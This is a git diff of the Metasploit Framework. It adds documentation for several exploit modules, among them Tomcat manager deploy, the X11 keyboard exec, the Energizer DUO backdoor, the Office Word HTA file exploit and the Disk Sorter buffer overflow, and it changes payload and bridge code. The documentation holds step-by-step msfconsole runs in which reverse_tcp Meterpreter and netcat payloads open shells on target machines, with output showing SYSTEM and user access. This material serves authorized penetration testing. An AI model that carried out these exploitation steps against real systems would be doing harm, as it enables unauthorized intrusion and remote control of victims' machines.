payload => linux/x86/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set target 3
target => 3
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Linux x86"
[*] Uploading 1545 bytes as 9bj4IYa66cSpdK.war ...
[!] No active DB -- Credential data will not be saved!
@ -243,7 +243,7 @@ Of note, the user was given `manager-gui` permissions by default.
[*] Sending stage (335800 bytes) to 192.168.2.156
[*] Undeploying 9bj4IYa66cSpdK ...
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.156:40020) at 2017-01-11 21:18:31 -0500
meterpreter > sysinfo
Computer : Ubuntu14.04
OS : Ubuntu 14.04 (Linux 4.2.0-27-generic)
@ -273,15 +273,15 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev
3. Exploit:
```
msf > use exploit/multi/http/tomcat_mgr_deploy
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
rhost => 192.168.2.118
msf exploit(tomcat_mgr_deploy) > set rport 8087
rport => 8087
msf exploit(tomcat_mgr_deploy) > set target 3
target => 3
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
payload => linux/x86/mettle/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
@ -294,8 +294,8 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev
msf exploit(tomcat_mgr_deploy) > set path /manager/text
path => /manager/text
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Linux x86"
[*] Uploading 1579 bytes as 9QymzSGGU0H4e.war ...
[!] No active DB -- Credential data will not be saved!
@ -304,7 +304,7 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (335800 bytes) to 192.168.2.118
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:34294) at 2017-01-08 20:35:24 -0500
meterpreter > sysinfo
Computer : 192.168.2.118
OS : Ubuntu 16.04 (Linux 4.4.0-21-generic)
@ -335,15 +335,15 @@ Of note, as of 7, the permission role 'manager' has been divided into several su
3. Exploit:
```
msf > use exploit/multi/http/tomcat_mgr_deploy
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
rhost => 192.168.2.118
msf exploit(tomcat_mgr_deploy) > set rport 8088
rport => 8088
msf exploit(tomcat_mgr_deploy) > set target 3
target => 3
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
payload => linux/x86/mettle/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
@ -355,8 +355,8 @@ Of note, as of 7, the permission role 'manager' has been divided into several su
msf exploit(tomcat_mgr_deploy) > set path /manager/text
path => /manager/text
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Linux x86"
[*] Uploading 1560 bytes as 9s0fTUyPa2HJCDnod2wEQJ.war ...
[!] No active DB -- Credential data will not be saved!
@ -365,7 +365,7 @@ Of note, as of 7, the permission role 'manager' has been divided into several su
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (335800 bytes) to 192.168.2.118
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:33802) at 2017-01-14 11:06:13 -0500
meterpreter > sysinfo
Computer : 192.168.2.118
OS : Ubuntu 16.04 (Linux 4.4.0-59-generic)

8
documentation/modules/exploit/multi/local/allwinner_backdoor.md
View File

@ -38,8 +38,8 @@ msf exploit(allwinner_backdoor) > set verbose true
verbose => true
msf exploit(allwinner_backdoor) > set session 1
session => 1
msf exploit(allwinner_backdoor) > set payload linux/armle/mettle/reverse_tcp
payload => linux/armle/mettle/reverse_tcp
msf exploit(allwinner_backdoor) > set payload linux/armle/meterpreter/reverse_tcp
payload => linux/armle/meterpreter/reverse_tcp
msf exploit(allwinner_backdoor) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(allwinner_backdoor) > check
@ -50,7 +50,7 @@ msf exploit(allwinner_backdoor) > exploit
## Successful exploitation:
```
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Transmitting intermediate stager...(136 bytes)
[*] Sending stage (374540 bytes) to 192.168.2.248
[+] Backdoor Found, writing payload to /tmp/odzVx.elf
@ -68,4 +68,4 @@ Computer : 192.168.2.248
OS : Ubuntu 14.04 (Linux 3.4.39)
Architecture : armv7l
Meterpreter : armle/linux
```
```

137
documentation/modules/exploit/unix/x11/x11_keyboard_exec.md Normal file
View File

@ -0,0 +1,137 @@
## Vulnerable Application
X11 (X Window System) is a graphical windowing system most common on unix/linux.
The service can accept connections from any users when misconfigured which is done with the command `xhost +`.
This exploit has been verified against:
1. Ubuntu 14.04
2. Ubuntu 16.04
3. Kali via Emulation method
This exploit does NOT work against:
1. Solaris 10 Java Desktop System (alt+F2 has no effect)
### Emulation
This can be emulated (on kali) utilizing the following command: `socat -d -d TCP-LISTEN:6000,fork UNIX-CONNECT:/tmp/.X11-unix/X0`
### Ubuntu 12.04, 14.04
1. `sudo nano /etc/lightdm/lightdm.conf`
2. Under the `[SeatDefaults]` area, add:
```
xserver-allow-tcp=true
allow-guest=true
```
3. logout or reboot
4. Verification: ```sudo netstat -antp | grep 6000```
```
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X
```
5. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
### Ubuntu 16.04
Use the Ubuntu 12.04 instructions, however change `SeatDefaults` to `Seat:*`
## Verification Steps
1. Install and configure X11
2. Start msfconsole
3. Do: `use exploit/unix/x11/x11_keyboard_exec`
4. Do: `set rhost [IPs]`
5. Do: `set payload [payload]`
6. Do: `exploit`
## Scenarios
### Ubuntu 14.04
```
msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(x11_keyboard_exec) > run
[*] Started bind handler
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Register keyboard
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Opening "Run Application"
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Waiting 5 seconds...
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Opening xterm
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Waiting 5 seconds...
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Typing and executing payload
[*] Command shell session 1 opened (192.168.2.117:44549 -> 192.168.2.75:4444) at 2017-04-23 15:26:56 -0400
id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"
NAME="Ubuntu"
VERSION="14.04.5 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.5 LTS"
VERSION_ID="14.04"
```
### Ubuntu 16.04
```
msf exploit(x11_keyboard_exec) > set rhost 192.168.2.26
rhost => 192.168.2.26
msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(x11_keyboard_exec) > exploit
[*] Started bind handler
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Register keyboard
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Opening "Run Application"
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Waiting 5 seconds...
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Opening xterm
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Waiting 5 seconds...
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Typing and executing payload
[*] Command shell session 2 opened (192.168.2.117:45813 -> 192.168.2.26:4444) at 2017-04-23 15:29:27 -0400
id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.1 LTS"
NAME="Ubuntu"
VERSION="16.04.1 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.1 LTS"
VERSION_ID="16.04"
UBUNTU_CODENAME=xenial
```
### Kali via Emulation
```
msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(x11_keyboard_exec) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf exploit(x11_keyboard_exec) > run
[*] Started bind handler
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Register keyboard
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Opening "Run Application"
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Waiting 5 seconds...
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Opening xterm
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Waiting 5 seconds...
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Typing and executing payload
[*] Command shell session 3 opened (127.0.0.1:37909 -> 127.0.0.1:4444) at 2017-04-23 15:35:26 -0400
```

36
documentation/modules/exploit/windows/backdoor/energizer_duo_payload.md Normal file
View File

@ -0,0 +1,36 @@
## Vulnerable Application
More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan).
Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.
The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx).
## Verification Steps
1. Install the vulnerable software
2. Start msfconsole
3. Do: `use exploit/windows/backdoor/energizer_duo_payload`
4. Do: `set rhost`
5. Do: `set payload`
6. Do: `exploit`
## Scenarios
A run against the backdoor
```
msf > use exploit/windows/backdoor/energizer_duo_payload
msf exploit(energizer_duo_payload) > set RHOST 192.168.0.132
msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(energizer_duo_payload) > set LHOST 192.168.0.228
msf exploit(energizer_duo_payload) > exploit
[*] Started reverse handler on 192.168.0.228:4444
[*] Trying to upload C:\NTL0ZTL4DhVL.exe...
[*] Trying to execute C:\NTL0ZTL4DhVL.exe...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (192.168.0.228:4444 -> 192.168.0.132:1200)
meterpreter > getuid
Server username: XPDEV\Developer
```

0
documentation/modules/exploit/windows/browser/firefox_uaf_smil.md → documentation/modules/exploit/windows/browser/firefox_smil_uaf.md
View File

68
documentation/modules/exploit/windows/fileformat/office_word_hta.md Normal file
View File

@ -0,0 +1,68 @@
Microsoft Office is an office suite of applications, servers, and services developed by Microsoft. Microsoft Office contains Microsoft Word, Microsoft Excel, Microsoft PowerPoint and so on. They can support OLE data integration and Virtusl Basic for Application scripting langauage.
FireEye detected malicious Microsoft Office RTF documents that leverage a previously undisclosed vulnerability. This vulnerability allows a malicious actor to execute a Visual Basic script when the user opens a document containing an embedded exploit. FireEye has observed several Office documents exploiting the vulnerability that download and execute malware payloads from different well-known malware families.
The attack involves a threat actor emailing a Microsoft Word document to a targeted user with an embedded OLE2link object. When the user opens the document, winword.exe issues a HTTP request to a remote server to retrieve a malicious .hta file, which appears as a fake RTF file. The Microsoft HTA application loads and executes the malicious script. In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link.
## Vulnerable Application
- Windows Vista Service Pack 2
- Windows Vista x64 Edition Service Pack 2
- Windows 7 for 32-bit Systems Service Pack 1
- Windows 7 for x64-based Systems Service Pack 1
- Windows Server 2008 for 32-bit Systems Service Pack 2
- Windows Server 2008 R2 for x64-based Systems Service Pack 1
- Windows Server 2008 for x64-based Systems Service Pack 2
- Windows Server 2008 for Itanium-Based Systems Service Pack 2
- Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
- Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
- Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
- Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
- Windows Server 2012
- Windows Server 2012 (Server Core installation)
- Microsoft Office 2007 Service Pack 3
- Microsoft Office 2013 Service Pack 1 (32-bit editions)
- Microsoft Office 2013 Service Pack 1 (64-bit editions)
- Microsoft Office 2010 Service Pack 2 (32-bit editions)
- Microsoft Office 2010 Service Pack 2 (64-bit editions)
- Microsoft Office 2016 (32-bit edition)
- Microsoft Office 2016 (64-bit edition)
## Verification Steps
1. Start msfconsole
2. Do: ```use exploit/windows/fileformat/office_word_hta```
3. Do: ```set payload [PAYLOAD NAME]```
3. Do: ```exploit```
## Demo
```
$ msfconsole
msf > use exploit/windows/fileformat/office_word_hta
msf exploit(office_word_hta) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(office_word_hta) > set lhost 192.168.146.1
lhost => 192.168.146.1
msf exploit(office_word_hta) > set srvhost 192.168.146.1
srvhost => 192.168.146.1
msf exploit(office_word_hta) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.146.1:4444
[+] msf.doc stored at /Users/wchen/.msf4/local/msf.doc
[*] Using URL: http://192.168.146.1:8080/default.hta
[*] Server started.
```
After you have the malicious doc file and servers ready, copy the doc file onto the victim machine,
and open it with Microsoft Office Word. You should receive a session:
```
[*] Sending stage (957487 bytes) to 192.168.146.145
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.145:50165) at 2017-04-24 16:00:49 -0500
```

73
documentation/modules/exploit/windows/http/disksorter_bof.md Normal file
View File

@ -0,0 +1,73 @@
## Vulnerable Application
[Disk Sorter Enterprise](http://www.disksorter.com) versions up to v9.5.12 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [Exploit-DB](https://www.exploit-db.com/apps/5ffae2c1a4b2165e0dd2a8e37765ef0e-disksorterent_setup_v9.5.12.exe).
## Verification Steps
1. Install a vulnerable Disk Sorter Enterprise
2. Start `Disk Sorter Enterprise` service
3. Start `Disk Sorter Enterprise` client application
4. Navigate to `Tools` > `Disk Sorter Options` > `Server`
5. Check `Enable Web Server On Port 80` to start the web interface
6. Start `msfconsole`
7. Do `use exploit/windows/http/disksorter_bof`
8. Do `set RHOST ip`
9. Do `check`
10. Verify the target is vulnerable
11. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
12. Do `set LHOST ip`
13. Do `exploit`
14. Verify the Meterpreter session is opened
## Scenarios
###Disk Sorter Enterprise v9.5.12 on Windows 7 SP1
```
msf exploit(disksorter_bof) > show options
Module options (exploit/windows/http/disksorter_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 172.16.0.9 yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.16.0.20 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Disk Sorter Enterprise v9.5.15
msf exploit(disksorter_bof) > exploit
[*] Started reverse TCP handler on 172.16.0.20:4444
[*] Sending request...
[*] Sending stage (957487 bytes) to 172.16.0.9
[*] Meterpreter session 1 opened (172.16.0.20:4444 -> 172.16.0.9:59371) at 2017-04-24 14:46:52 +0100
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : pt_PT
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >
```

0
documentation/modules/exploit/winrm/winrm_script_exec.md → documentation/modules/exploit/windows/winrm/winrm_script_exec.md
View File

4
documentation/modules/payload/linux/x86/meterpreter/reverse_tcp.md
View File

@ -1,4 +1,4 @@
linux/x86/meterpreter/reverse_tcp is the most pouplar payload against the Linux platform. It allows
linux/x86/meterpreter/reverse_tcp is the most popular payload against the Linux platform. It allows
you to remotely take over the compromised system, having control of the file system, collect
sensitive information such as credentials using post modules, etc.
@ -209,7 +209,7 @@ meterpreter > help
## Using a Post module
One of the best things about Meterprter is you have access to a variety of post modules that
One of the best things about Meterpreter is you have access to a variety of post modules that
"shell" sessions might not have. Post modules provide you with more capabilities to collect data
from the remote machine automatically. For example, stealing credentials from the system or
third-party applications, or modify settings, etc.

46
documentation/modules/post/hardware/automotive/canprobe.md Normal file
View File

@ -0,0 +1,46 @@
A basic fuzzer for CAN IDs. It can scan through CAN IDs and probes each data section
with a set value. The defualt is 0xFF. It can also iterate through all the possible
values for each byte as well. It has no concept of what is going on and makes no
attempt to check for return packets.
## Options
**STARTID**
The CAN ID to start your scan from.
**STOPID**
The CAN ID to stop the CAN scan. If no STOPID is specified it will only scan one ID (STARTID).
**FUZZ**
If true the data segment will iterate through all possiblities (0-255).
**PROBEVALUE**
The value to put at each data segment. The default is 0xFF. When Fuzz is enabled this value is ignored.
**PADDING**
If you need to pad out the packet to be 8 packets for each request you can set this value to something between 0-255.
**CANBUS**
The bus to scan. See 'supported_buses' for a list of available buses.
## Scenarios
To quickly test how a vehicle or ECU reacts to random data throughout the packet. For instance, you
have identified some door controls using a certain CAN ID. By probing the other values you can often identify
other door related functions.
Note: This is not a scanner. You would not want to run this against all the IDs in a car and expect (good) results.
```
hwbridge > run post/hardware/automotive/canprobe CANBUS=can0 STARTID=0x320 fuzz=true
[*] Probing 0x320...
[*] Probe Complete
```

68
documentation/modules/post/multi/manage/upload_exec.md Normal file
View File

@ -0,0 +1,68 @@
This module allows you to upload a binary file, and automatically execute it.
## Vulnerable Application
The following platforms are supported:
* Windows
* Linux
* OS X
## Verification Steps
1. Prepare for an executable file you wish to upload and execute.
2. Obtain a session from the target machine.
3. In msfconsole, do ```use post/multi/manage/upload_exec```
4. Set the ```LFILE``` option
5. Set the ```RFILE``` option
6. Set the ```SESSION``` option
7. ```run```
## Options
**LFILE**
The file on your machine that you want to upload to the target machine.
**RFILE**
The file path on the target machine. This defaults to LFILE.
## Demo
```
msf > use post/multi/manage/upload_exec
msf post(upload_exec) > show options
Module options (post/multi/manage/upload_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
LFILE yes Local file to upload and execute
RFILE no Name of file on target (default is basename of LFILE)
SESSION yes The session to run this module on.
msf post(upload_exec) > set lfile /tmp/
lfile => /tmp/
msf post(upload_exec) > set lfile /tmp/msg.exe
lfile => /tmp/msg.exe
msf post(upload_exec) > set rfile C:\\Users\\sinn3r\\Desktop\\msg.exe
rfile => C:\Users\sinn3r\Desktop\msg.exe
msf post(upload_exec) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/windows WIN-6NH0Q8CJQVM\sinn3r @ WIN-6NH0Q8CJQVM 192.168.146.1:4444 -> 192.168.146.149:50168 (192.168.146.149)
msf post(upload_exec) > set session 1
session => 1
msf post(upload_exec) > run
[-] Post interrupted by the console user
[*] Post module execution completed
```

0
documentation/modules/post/windows/gather/mdaemon_cred_collector.md → documentation/modules/post/windows/gather/credentials/mdaemon_cred_collector.md
View File

2
lib/metasploit/framework/version.rb
View File

@ -30,7 +30,7 @@ module Metasploit
end
end
VERSION = "4.14.15"
VERSION = "4.14.17"
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
PRERELEASE = 'dev'
HASH = get_hash

2
lib/msf/base/sessions/meterpreter_x64_mettle_linux.rb → lib/msf/base/sessions/meterpreter_x64_linux.rb
View File

@ -10,7 +10,7 @@ module Sessions
# This class creates a platform-specific meterpreter session type
#
###
class Meterpreter_x64_Mettle_Linux < Msf::Sessions::Meterpreter
class Meterpreter_x64_Linux < Msf::Sessions::Meterpreter
def supports_ssl?
false
end

6
lib/msf/base/sessions/meterpreter_x86_linux.rb
View File

@ -11,6 +11,12 @@ module Sessions
#
###
class Meterpreter_x86_Linux < Msf::Sessions::Meterpreter
def supports_ssl?
false
end
def supports_zlib?
false
end
def initialize(rstream, opts={})
super
self.base_platform = 'linux'

29
lib/msf/base/sessions/meterpreter_x86_mettle_linux.rb
View File

@ -1,29 +0,0 @@
# -*- coding: binary -*-
require 'msf/base/sessions/meterpreter'
module Msf
module Sessions
###
#
# This class creates a platform-specific meterpreter session type
#
###
class Meterpreter_x86_Mettle_Linux < Msf::Sessions::Meterpreter
def supports_ssl?
false
end
def supports_zlib?
false
end
def initialize(rstream, opts={})
super
self.base_platform = 'linux'
self.base_arch = ARCH_X86
end
end
end
end

77
lib/msf/base/sessions/mettle_config.rb
View File

@ -1,22 +1,75 @@
# -*- coding: binary -*-
require 'msf/core/payload/transport_config'
require 'msf/core/payload/uuid/options'
require 'base64'
module Msf
module Sessions
module MettleConfig
module Sessions
module MettleConfig
include Msf::Payload::TransportConfig
include Msf::Payload::TransportConfig
def generate_config(opts={})
transport = transport_config_reverse_tcp(opts)
opts[:uuid] ||= generate_payload_uuid
opts[:uuid] = Base64.encode64(opts[:uuid].to_raw).strip
opts[:uri] ||= "#{transport[:scheme]}://#{transport[:lhost]}:#{transport[:lport]}"
opts.slice(:uuid, :uri, :debug, :log_file)
def generate_uri(opts={})
ds = opts[:datastore] || datastore
uri_req_len = ds['StagerURILength'].to_i
# Choose a random URI length between 30 and 128 bytes
if uri_req_len == 0
uri_req_len = 30 + luri.length + rand(127 - (30 + luri.length))
end
if uri_req_len < 5
raise ArgumentError, "Minimum StagerURILength is 5"
end
generate_uri_uuid_mode(:init_connect, uri_req_len, uuid: opts[:uuid])
end
def generate_http_uri(opts)
if Rex::Socket.is_ipv6?(opts[:lhost])
target_uri = "#{opts[:scheme]}://[#{opts[:lhost]}]"
else
target_uri = "#{opts[:scheme]}://#{opts[:lhost]}"
end
target_uri << ':'
target_uri << opts[:lport].to_s
target_uri << luri
target_uri << generate_uri(opts)
target_uri
end
def generate_tcp_uri(opts)
if Rex::Socket.is_ipv6?(opts[:lhost])
target_uri = "#{opts[:scheme]}://[#{opts[:lhost]}]"
else
target_uri = "#{opts[:scheme]}://#{opts[:lhost]}"
end
target_uri << ':'
target_uri << opts[:lport].to_s
target_uri
end
def generate_config(opts={})
opts[:uuid] ||= generate_payload_uuid
case opts[:scheme]
when 'http'
transport = transport_config_reverse_http(opts)
opts[:uri] = generate_http_uri(transport)
when 'https'
transport = transport_config_reverse_https(opts)
opts[:uri] = generate_http_uri(transport)
when 'tcp'
transport = transport_config_reverse_tcp(opts)
opts[:uri] = generate_tcp_uri(transport)
else
raise ArgumentError, "Unknown scheme: #{opts[:scheme]}"
end
opts[:uuid] = Base64.encode64(opts[:uuid].to_raw).strip
opts.slice(:uuid, :uri, :debug, :log_file)
end
end
end
end
end
end

2
lib/msf/core/exploit/smtp_deliver.rb
View File

@ -194,6 +194,8 @@ module Exploit::Remote::SMTPDeliver
full_msg << date unless data =~ /date: /i
full_msg << subject unless subject.nil? || data =~ /subject: /i
full_msg << data
# Escape leading dots in the mail messages so there are no false EOF
full_msg.gsub!(/(?m)^\./, '..')
send_status = raw_send_recv("#{full_msg}\r\n.\r\n", nsock)
end
else

2
lib/msf/core/handler/reverse_http.rb
View File

@ -45,7 +45,7 @@ module ReverseHttp
register_options(
[
OptString.new('LHOST', [true, 'The local listener hostname']),
OptAddressLocal.new('LHOST', [true, 'The local listener hostname']),
OptPort.new('LPORT', [true, 'The local listener port', 8080]),
OptString.new('LURI', [false, 'The HTTP Path', ''])
], Msf::Handler::ReverseHttp)

2
lib/msf/core/handler/reverse_https_proxy.rb
View File

@ -38,7 +38,7 @@ module ReverseHttpsProxy
register_options(
[
OptString.new('LHOST', [ true, "The local listener hostname" ,"127.0.0.1"]),
OptAddressLocal.new('LHOST', [ true, "The local listener hostname" ,"127.0.0.1"]),
OptPort.new('LPORT', [ true, "The local listener port", 8443 ]),
OptString.new('PayloadProxyHost', [true, "The proxy server's IP address", "127.0.0.1"]),
OptPort.new('PayloadProxyPort', [true, "The proxy port to connect to", 8080 ]),

23
lib/msf/core/module/external.rb Normal file
View File

@ -0,0 +1,23 @@
module Msf::Module::External
def wait_status(mod)
while mod.running
m = mod.get_status
if m
case m['level']
when 'error'
print_error m['message']
when 'warning'
print_warning m['message']
when 'good'
print_good m['message']
when 'info'
print_status m['message']
when 'debug'
vprint_status m['message']
else
print_status m['message']
end
end
end
end
end

37
lib/msf/core/modules/external/bridge.rb vendored
View File

@ -7,6 +7,10 @@ class Msf::Modules::External::Bridge
attr_reader :path, :running
def self.applies?(module_name)
File::executable? module_name
end
def meta
@meta ||= describe
end
@ -34,6 +38,7 @@ class Msf::Modules::External::Bridge
end
def initialize(module_path)
self.env = {}
self.running = false
self.path = module_path
end
@ -41,7 +46,7 @@ class Msf::Modules::External::Bridge
protected
attr_writer :path, :running
attr_accessor :ios
attr_accessor :env, :ios
def describe
resp = send_receive(Msf::Modules::External::Message.new(:describe))
@ -57,7 +62,7 @@ class Msf::Modules::External::Bridge
end
def send(message)
input, output, status = ::Open3.popen3([self.path, self.path])
input, output, status = ::Open3.popen3(env, [self.path, self.path])
self.ios = [input, output, status]
case Rex::ThreadSafe.select(nil, [input], nil, 0.1)
when nil
@ -98,3 +103,31 @@ class Msf::Modules::External::Bridge
[input, output].each {|fd| fd.close rescue nil} # Yeah, yeah. I know.
end
end
class Msf::Modules::External::PyBridge < Msf::Modules::External::Bridge
def self.applies?(module_name)
module_name.match? /\.py$/
end
def initialize(module_path)
super
pythonpath = ENV['PYTHONPATH'] || ''
self.env = self.env.merge({ 'PYTHONPATH' => pythonpath + File::PATH_SEPARATOR + File.expand_path('../python', __FILE__) })
end
end
class Msf::Modules::External::Bridge
LOADERS = [
Msf::Modules::External::PyBridge,
Msf::Modules::External::Bridge
]
def self.open(module_path)
LOADERS.each do |klass|
return klass.new module_path if klass.applies? module_path
end
nil
end
end

0
lib/msf/core/modules/external/python/metasploit/__init__.py vendored Normal file
View File

20
lib/msf/core/modules/external/python/metasploit/module.py vendored Normal file
View File

@ -0,0 +1,20 @@
import sys, os, json
def log(message, level='info'):
print(json.dumps({'jsonrpc': '2.0', 'method': 'message', 'params': {
'level': level,
'message': message
}}))
sys.stdout.flush()
def run(metadata, exploit):
req = json.loads(os.read(0, 10000))
if req['method'] == 'describe':
print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata}))
elif req['method'] == 'run':
args = req['params']
exploit(args)
print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': {
'message': 'Exploit completed'
}}))
sys.stdout.flush()

130
lib/msf/core/modules/external/shim.rb vendored
View File

@ -4,98 +4,56 @@ require 'msf/core/modules/external/bridge'
class Msf::Modules::External::Shim
def self.generate(module_path)
mod = Msf::Modules::External::Bridge.new(module_path)
mod = Msf::Modules::External::Bridge.open(module_path)
return '' unless mod.meta
case mod.meta['type']
when 'remote_exploit.cmd_stager.wget'
when 'remote_exploit_cmd_stager'
remote_exploit_cmd_stager(mod)
end
end
def self.render_template(name, meta = {})
template = File.join(File.dirname(__FILE__), 'templates', name)
ERB.new(File.read(template)).result(binding)
end
def self.common_metadata(meta = {})
render_template('common_metadata.erb', meta)
end
def self.mod_meta_common(mod, meta = {})
meta[:path] = mod.path.dump
meta[:name] = mod.meta['name'].dump
meta[:description] = mod.meta['description'].dump
meta[:authors] = mod.meta['authors'].map(&:dump).join(",\n ")
meta[:date] = mod.meta['date'].dump
meta[:references] = mod.meta['references'].map do |r|
"[#{r['type'].upcase.dump}, #{r['ref'].dump}]"
end.join(",\n ")
meta[:options] = mod.meta['options'].map do |n, o|
"Opt#{o['type'].capitalize}.new(#{n.dump},
[#{o['required']}, #{o['description'].dump}, #{o['default'].inspect}])"
end.join(",\n ")
meta
end
def self.mod_meta_exploit(mod, meta = {})
meta[:wfsdelay] = mod.meta['wfsdelay'] || 5
meta[:privileged] = mod.meta['privileged'].inspect
meta[:platform] = mod.meta['targets'].map do |t|
t['platform'].dump
end.uniq.join(",\n ")
meta[:targets] = mod.meta['targets'].map do |t|
"[#{t['platform'].dump} + ' ' + #{t['arch'].dump}, {'Arch' => ARCH_#{t['arch'].upcase}, 'Platform' => #{t['platform'].dump} }]"
end.join(",\n ")
meta
end
def self.remote_exploit_cmd_stager(mod)
